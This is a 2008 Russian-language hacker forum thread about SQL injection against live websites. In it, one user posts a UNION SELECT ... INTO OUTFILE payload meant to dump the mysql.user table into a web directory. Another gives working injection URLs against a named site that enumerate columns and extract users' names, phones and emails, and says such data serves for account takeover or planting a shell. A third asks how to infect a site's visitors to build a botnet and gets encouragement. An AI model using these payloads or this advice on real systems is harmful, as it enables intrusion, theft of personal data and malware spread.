28.04.2008, 18:34
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223
Репутация:
5
|
|
Подскажите кто нибудь:
Система UNIX.
В httpd.conf прописано:
<VirtualHost *>
ServerAdmin webmaster@site.com
DocumentRoot /www/htdocs/rail
ServerName www.site.com
# ServerAlias 10.7.103.250
ServerAlias 10.7.100.4
ErrorLog /var/log/apache/railway.log
CustomLog /var/log/apache/railway.log common
</VirtualHost>
Дальше нужно записать файл в директорию /www/htdocs/rail:
www.site.com/index=4&number=1'+union+select+1,2,3,convert(те ст+using+cp1251)+from+mysql.user+into+outfile+" \\www\\htdocs\\rail\\1.txt"/*
Вроде записалось, проверяем:
www.site.com/1.txt и нифига не получилось... Кто скажет почему???
|
|
|
28.04.2008, 18:52
|
|
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме:
1266776
Репутация:
93
|
|
xaker-boss, Раскручиваешь в этом случае значит "достаешь максимум информации".
Воспользовать информацией, естественно, можно в любых целях. Начиная от доступа к аккаунтам юзеров на портале(если таковые есть) до заливки шелла.
Вся "раскрутка" описана ранее в статьях.
Могу лишь привести банальный пример:
есть у меня информация типа:
http://haty.com.ua/show.php?id=-90061+union+select+1,database(),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,user(),version(),23,2 4,25/*
5.0.45-community-log
например мне этот ресурс интересен.
Зная, что это 5 ветка MSSQL, я могу воспользоваться информацией, находящейся в infromation_schema.columns, а именно имена столбцов и полей.
Код:
17:booltxt
17:--1:text
18:cities
18:--1:text
19:kvbath
19:--1:text
20:kvdata
20:--1:date
20:--2:user
20:--3:meta
20:--4:type
20:--5:city
20:--6:strt
20:--7:stor
20:--8:high
20:--9:bath
20:--10:flor
20:--11:stat
20:--12:stot
20:--13:skit
20:--14:sliv
20:--15:dstr
20:--16:wall
20:--17:hnum
20:--18:pric
20:--19:tele
20:--20:dscr
20:--21:cnam
20:--22:ctel
20:--23:mail
20:--24:agen
21:kvfloor
21:--1:text
22:kvmeta
22:--1:text
23:kvstate
23:--1:text
24:kvtype
24:--1:text
25:kvtype1rp
25:--1:text
26:kvuser
26:--1:password
27:kvwall
27:--1:text
Например меня интересуют данные, касающиеся информации о пользователях:
http://haty.com.ua/show.php?id=-90061+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,concat_ws(0x2020,user,cnam,cte l,city,tele,mail,agen),22,23,24,25+from+kvdata+lim it+0,1--
и получаю что хотел.
Все чисто для примера.
|
|
|
|
28.04.2008, 18:55
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
На100ящий не хватает прав на диру
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
28.04.2008, 18:59
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957
Репутация:
56
|
|
интересует такой вопрос...
вот я имею крупный сервер, посещает его довольно таки много человек...
можно ли через этот сайт троянить юзеров??(и как)
цель: поднять ботнет сеть.
|
|
|
|
28.04.2008, 19:31
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223
Репутация:
5
|
|
Права есть 'y', рутовые....
|
|
|
|
28.04.2008, 19:38
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957
Репутация:
56
|
|
права над сервером полные!
|
|
|
|
28.04.2008, 19:50
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885
Репутация:
447
|
|
На100ящий
с чего ты взял что рутовые?
-=megahertz=-
можно ли через этот сайт троянить юзеров
конечно можно,совсем не давно моя ася так и ушла  ,благодарю того человека который ее вернул.)
ps:вот почитай
Код:
http://forum.antichat.ru/thread58732.html
может пригодится.
Последний раз редактировалось }{0TT@БЬ)Ч; 28.04.2008 в 20:00..
|
|
|
|
28.04.2008, 19:53
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957
Репутация:
56
|
|
}{0tt@БЬ)Ч
ну взял с того что я могу творить над сервером все что хочу...
|
|
|
|
29.04.2008, 01:02
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
-=megahertz=-, напиши в консоли whoami;id и скинь результат
|
|
|
|
29.04.2008, 07:14
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957
Репутация:
56
|
|
server
uid=1000(server) gid=1000(server) groups=1000(server)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
